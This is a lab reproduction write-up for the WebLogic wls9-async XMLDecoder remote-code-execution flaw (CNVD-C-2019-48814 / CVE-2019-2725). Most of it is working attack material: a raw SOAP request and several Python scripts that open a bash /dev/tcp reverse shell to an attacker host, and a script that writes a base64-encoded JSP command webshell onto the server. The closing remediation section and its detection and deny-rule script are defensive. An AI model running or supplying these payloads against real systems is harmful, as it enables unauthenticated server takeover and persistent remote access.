Vulnerability overview
WebLogic is an application server from Oracle (US). More precisely it is middleware built on the Java EE architecture: a Java application server used to develop, integrate, deploy and manage large distributed web, network and database applications.
WebLogic brings the dynamic features of Java and the security of the Java Enterprise standards to the development, integration, deployment and management of large networked applications. It is one of the main commercial Java (J2EE) application servers, was the first J2EE application server to be commercialised successfully, and is known for scalability, rapid development, flexibility and reliability.
CNVD-C-2019-48814 (later tracked by Oracle as CVE-2019-2725) abuses the wls9-async component of WebLogic. Without authentication, an attacker POSTs malicious XML to the
/_async/AsyncResponseService path; the WorkContext SOAP header is handed to java.beans.XMLDecoder on the server, which instantiates whatever classes the XML names (java.lang.ProcessBuilder in the payloads below). That gives remote command execution as the WebLogic service account, from which the attacker can take over the whole server.
Affected versions
WebLogic 10.x (10.3.6.0 in Oracle's advisory)
WebLogic 12.1.3.0
Reproduction
0x00
First turn off the firewall on the CentOS host (lab only; this just keeps port 7001 reachable from Kali).
![image-20240209175418004](D:\hexo\source_posts\漏洞复现\NVD-C-2019-48814.assets\image-20240209175418004.png)
Start WebLogic from the sample domain's bin directory:

```bash
cd /usr/local/weblogic/wlserver_10.3/samples/domains/wl_server/bin
./startWebLogic.sh   # start script of the wl_server sample domain
```
Switch back to Kali and check whether the server is up.
![image-20240209175808072](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209175808072.png)
Port 7001 answers, so WebLogic is running.
Vulnerability verification
Visit http://10.1.1.100:7001/_async/
![image-20240209180000357](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209180000357.png)
Then visit http://10.1.1.100:7001/_async/AsyncResponseService
![image-20240209180125962](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209180125962.png)
If the service page comes back instead of a 404, the wls9-async component is deployed and the CNVD-C-2019-48814 entry point exists. That alone does not prove the host is unpatched; the exploit in 0x01 is the real test.
0x01
First start an nc listener on a port to catch the reverse shell.
Then enable the proxy in Firefox
![image-20240209181632662](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209181632662.png)
and set the port to Burp Suite's default, 8080.
Then start the Burp Suite bundled with Kali.
![image-20240209181736807](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209181736807.png)
Method 1: capture and edit the request by hand
Capture the request to http://10.1.1.100:7001/_async/AsyncResponseService
![image-20240209182911352](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209182911352.png)
Check the attacker IP address
![image-20240209183621287](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209183621287.png)
and replace the request with the following payload
```http
POST /_async/AsyncResponseService HTTP/1.1
Host: 10.1.1.100:7001
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
          <void index="0"><string>/bin/bash</string></void>
          <void index="1"><string>-c</string></void>
          <void index="2"><string>bash -i >& /dev/tcp/10.1.1.200/666 0>&1</string></void>
        </array>
        <void method="start"/>
      </void>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
```

Change the IP and port to your own listener (the payload above calls back to 10.1.1.200:666, so the nc listener from the start of this section must be on that port). Burp Repeater recalculates Content-Length when you edit the body, so the value 789 does not need adjusting by hand. If the server rejects the request with an XML parse error, write the command with XML entities (`&gt;&amp;` for `>&`, `0&gt;&amp;1` for `0>&1`); a bare `&` is not well-formed XML, and XMLDecoder decodes the entities before the string reaches ProcessBuilder.
![image-20240209183108034](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209183108034.png)
The request goes through.
![image-20240209183130738](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209183130738.png)
The reverse shell connects back.
Method 2: use a script
The script below is jas502n's reverse-shell script, ported from Python 2 to Python 3. The hard-coded Content-Length header of the original has been dropped because requests computes it from the actual body; a wrong value makes the server truncate or reject the XML.

```python
import sys
import requests

# Usage: python async_reserve_shell.py <url> <reverse_ip> <reverse_port>
if len(sys.argv) != 4:
    print(">>>> usage: python test.py url reserve_ip reserve_port\n")
    sys.exit(1)

url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

# Banner of the original script ("Bypass", by jas502n,
# "No Patch For CVE-2017-10271 / _async/AsyncResponseService RCE")
print("Bypass  By jas502n  No Patch For CVE-2017-10271  _async/AsyncResponseService RCE\n")

# Same payload as method 1, wrapped in the <java class="java.beans.XMLDecoder"> element;
# %s/%s are the listener IP and port.
payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>bash -i >& /dev/tcp/%s/%s 0>&1</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>""" % (ip, port)

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Forwarded-For": "127.0.0.2",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "text/xml",
    "cache-control": "no-cache",
}

# ProcessBuilder.start() returns immediately, so the response comes back even
# though the spawned shell keeps running.
response = requests.post(url, data=payload.encode(), headers=headers, timeout=10)
print("status_code:%s" % response.status_code)
print(response.text)
```
```bash
python async_reserve_shell.py http://10.1.1.100:7001/_async/AsyncResponseService 10.1.1.200 9999
```
The shell connects back to the listener on 9999.
![image-20240209183647200](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209183647200.png)
0x03
Upload a webshell using CNVD-C-2019-48814
Use the script directly (jas502n's webshell script, ported to Python 3 in the same way as method 2). It runs the same ProcessBuilder chain, but the command writes a base64-encoded JSP command shell into the exploded wls9-async war directory so it is served under /_async/.

```python
import sys
import requests

# Usage: python webshell.py <base_url> <webshell.jsp>
if len(sys.argv) != 3:
    print("\n>>>>Usage: python webshell.py url webshell.jsp\n")
    sys.exit(1)

url = sys.argv[1]
url_dir = "/_async/AsyncResponseService"
vuln_url = url + url_dir

# Banner of the original script ("webshell", by jas502n,
# "No Patch For CVE-2017-10271 / _async/AsyncResponseService RCE")
print("webshell  By jas502n  No Patch For CVE-2017-10271  _async/AsyncResponseService RCE\n")
print(">>>The Vuln Url: %s\n" % vuln_url)

webshell_name = sys.argv[2]
# Exploded war of the wls9-async application, relative to the domain directory the
# server process runs in. The server name (examplesServer here) and the random
# segment (tfmgqe) differ per installation; read them from the target first, for
# example over the reverse shell from 0x01, or the file lands in the wrong place.
webshell_dir = "servers/examplesServer/tmp/_WL_internal/bea_wls9_async_response/tfmgqe/war/"

# The base64 blob is a JSP that runs ?cmd=<command> via Runtime.exec and prints the output.
payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > %s%s</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>""" % (webshell_dir, webshell_name)

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Content-Type": "text/xml",
    "cache-control": "no-cache",
}

response = requests.post(vuln_url, data=payload.encode(), headers=headers, timeout=10)
print("\n\nWebshell: \n")
print(url + "/_async/" + webshell_name + "?cmd=whoami")
print(response.text)
```
![image-20240209192401823](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209192401823.png)
Open the printed URL (the JSP under /_async/ with ?cmd=whoami):
![image-20240209192536148](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%95%B4%E7%90%86/weblogic%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240209192536148.png)
Reproduction complete.
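Both scripts above, and the hand-edited request in method 1, splice the command into the XML with string formatting, so any `&` or `<` in the command (the `>&` of the reverse shell, or a pipeline in the webshell drop) yields XML that a strict parser rejects. The following is an added example, my own code rather than the post's or jas502n's, that builds the same envelope with xml.etree.ElementTree so the command text is escaped automatically, and parses the result back to show the argv XMLDecoder would hand to ProcessBuilder. It serves both the reverse shell of 0x01 and the webshell drop of 0x03: only the argv changes. The host, port and script name are placeholders, and the `send` helper is an assumption about how one would post the envelope; it is not exercised here.

```python
"""Build the wls9-async (CNVD-C-2019-48814 / CVE-2019-2725) SOAP envelope with a
real XML serialiser instead of string formatting. Added example, not the post's code."""
import sys
import urllib.request
import xml.etree.ElementTree as ET

SOAPENV = "http://schemas.xmlsoap.org/soap/envelope/"
WSA = "http://www.w3.org/2005/08/addressing"
ASY = "http://www.bea.com/async/AsyncResponseService"
WORK = "http://bea.com/2004/06/soap/workarea/"

# Keep the prefixes the hand-written payload uses so the output stays recognisable.
for _prefix, _uri in (("soapenv", SOAPENV), ("wsa", WSA), ("asy", ASY), ("work", WORK)):
    ET.register_namespace(_prefix, _uri)


def reverse_shell_argv(lhost, lport):
    """argv for the same bash reverse shell the post uses (0x01)."""
    return ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"]


def drop_file_argv(b64_content, path):
    """argv for the webshell drop of 0x03: decode base64 content into `path`."""
    return ["/bin/bash", "-c", f"echo {b64_content} | base64 -d > {path}"]


def build_envelope(argv):
    """Return the SOAP envelope as a str. The WorkContext header carries an
    XMLDecoder document that builds java.lang.ProcessBuilder(argv) and calls start()."""
    env = ET.Element(f"{{{SOAPENV}}}Envelope")
    header = ET.SubElement(env, f"{{{SOAPENV}}}Header")
    ET.SubElement(header, f"{{{WSA}}}Action").text = "xx"
    ET.SubElement(header, f"{{{WSA}}}RelatesTo").text = "xx"
    work = ET.SubElement(header, f"{{{WORK}}}WorkContext")
    java = ET.SubElement(work, "java", {"version": "1.4.0", "class": "java.beans.XMLDecoder"})
    pb = ET.SubElement(java, "void", {"class": "java.lang.ProcessBuilder"})
    arr = ET.SubElement(pb, "array", {"class": "java.lang.String", "length": str(len(argv))})
    for i, arg in enumerate(argv):
        slot = ET.SubElement(arr, "void", {"index": str(i)})
        ET.SubElement(slot, "string").text = arg  # '&', '<' and '>' are escaped on output
    ET.SubElement(pb, "void", {"method": "start"})
    body = ET.SubElement(env, f"{{{SOAPENV}}}Body")
    ET.SubElement(body, f"{{{ASY}}}onAsyncDelivery")
    return ET.tostring(env, encoding="unicode")


def extract_argv(envelope):
    """Parse an envelope and return the argv it carries, i.e. the strings
    XMLDecoder would see after entity decoding."""
    root = ET.fromstring(envelope)
    return [s.text for s in root.iter("string")]


def send(url, envelope, timeout=10):
    """POST the envelope to .../_async/AsyncResponseService; returns (status, body).
    Assumed transport, not exercised in this example."""
    req = urllib.request.Request(
        url, data=envelope.encode(), method="POST",
        headers={"Content-Type": "text/xml", "SOAPAction": ""})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # python build_async_payload.py http://10.1.1.100:7001/_async/AsyncResponseService 10.1.1.200 9999
    target, lhost, lport = sys.argv[1:4]
    print(send(target, build_envelope(reverse_shell_argv(lhost, lport))))
```

ElementTree puts the four namespace declarations on the root element rather than on WorkContext, which is equivalent XML; the serialised command reads `bash -i &gt;&amp; /dev/tcp/...`, and `extract_argv` shows it decodes back to the literal `>&` form.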
Remediation
When CNVD published the advisory, Oracle had not yet released a patch, and the two measures below were the interim workaround. Oracle later tracked the issue as CVE-2019-2725 and shipped an out-of-band Security Alert patch; that first patch was itself bypassed (CVE-2019-2729), so make sure the later fix is applied as well and keep up with the quarterly Critical Patch Updates rather than relying on the workarounds alone.
1. Locate and delete wls9_async_response.war and wls-wsat.war, then restart the WebLogic service. This removes the asynchronous web-service and WS-AT features, so first confirm that no deployed application depends on them.
2. Use a URL access-control policy to deny access to the /_async/* and /wls-wsat/* paths (at minimum from untrusted networks). Apply the rule to the decoded, normalised path, since a plain prefix match on the raw request line is easy to dodge with percent-encoding or dot segments.
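To make workaround 2 and the matching detection concrete, here is an added example (my own code, not part of the original post or of any WebLogic configuration) that expresses the deny rule for /_async/* and /wls-wsat/* as a path check on the normalised path, and flags requests whose body carries the WorkContext header with an XMLDecoder chain that instantiates a process-spawning class. The sample requests at the bottom are constructed, not captured traffic.

```python
"""Interim access policy and request-level detection for the wls9-async /
wls-wsat XMLDecoder entry points. Added example; sample traffic is constructed."""
import posixpath
import re
from urllib.parse import unquote

# Paths the CNVD workaround denies (everything beneath them).
BLOCKED_PREFIXES = ("/_async/", "/wls-wsat/")

# Body indicators: a WorkContext SOAP header, and an XMLDecoder instruction set
# naming a class that spawns processes (or XMLDecoder itself).
WORKCONTEXT_RE = re.compile(r"<\s*[\w-]*:?WorkContext\b", re.I)
SINK_RE = re.compile(
    r'class\s*=\s*"(java\.lang\.ProcessBuilder|java\.lang\.Runtime|java\.beans\.XMLDecoder)"',
    re.I,
)


def normalize_path(raw_path):
    """Strip the query, percent-decode twice (double encoding) and collapse
    '.' / '..' so a prefix rule cannot be dodged with encoding tricks."""
    path = raw_path.split("?", 1)[0]
    path = unquote(unquote(path))
    return posixpath.normpath(path)


def is_blocked(raw_path):
    """The interim access policy: deny /_async/* and /wls-wsat/*."""
    path = normalize_path(raw_path)
    return any(path == p.rstrip("/") or path.startswith(p) for p in BLOCKED_PREFIXES)


def classify(method, raw_path, body):
    """Indicators for one request; an empty list means nothing suspicious."""
    hits = []
    if not is_blocked(raw_path):
        return hits
    hits.append("xmldecoder-endpoint")
    if method.upper() == "POST" and WORKCONTEXT_RE.search(body):
        hits.append("workcontext-header")
        sink = SINK_RE.search(body)
        if sink:
            hits.append("sink:" + sink.group(1))
    return hits


def scan(reqs):
    """Run classify() over (method, path, body) tuples; return the flagged ones."""
    flagged = []
    for method, path, body in reqs:
        hits = classify(method, path, body)
        if hits:
            flagged.append((method, path, hits))
    return flagged


# Constructed sample traffic (not captured from a real host).
EXPLOIT_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>id</string></void></array><void method="start"/></void>'
    '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
)
SAMPLE_REQUESTS = [
    ("GET", "/_async/AsyncResponseService", ""),                        # probe from the verification step
    ("POST", "/_async/AsyncResponseService", EXPLOIT_BODY),              # the exploit
    ("POST", "/wls-wsat/CoordinatorPortType",                            # CVE-2017-10271 sibling endpoint
     '<s:Envelope><s:Header><work:WorkContext><java class="java.beans.XMLDecoder"/>'
     '</work:WorkContext></s:Header></s:Envelope>'),
    ("POST", "/%5Fasync/AsyncResponseService", EXPLOIT_BODY),            # percent-encoded underscore
    ("POST", "/console/../_async/AsyncResponseService", EXPLOIT_BODY),   # dot segments into the prefix
    ("POST", "/myapp/orders", "<order><id>42</id></order>"),              # ordinary application traffic
]

if __name__ == "__main__":
    for method, path, hits in scan(SAMPLE_REQUESTS):
        print(f"{method} {path} -> {', '.join(hits)}")
```

In production the deny rule belongs in front of WebLogic (the server's own URL access policy or a reverse proxy), and the body indicators belong in the WAF or IDS; the point of the code is the order of operations, normalise first and then match, plus the fact that a GET to the endpoint is reconnaissance while a POST carrying WorkContext plus a ProcessBuilder or XMLDecoder class is an exploitation attempt.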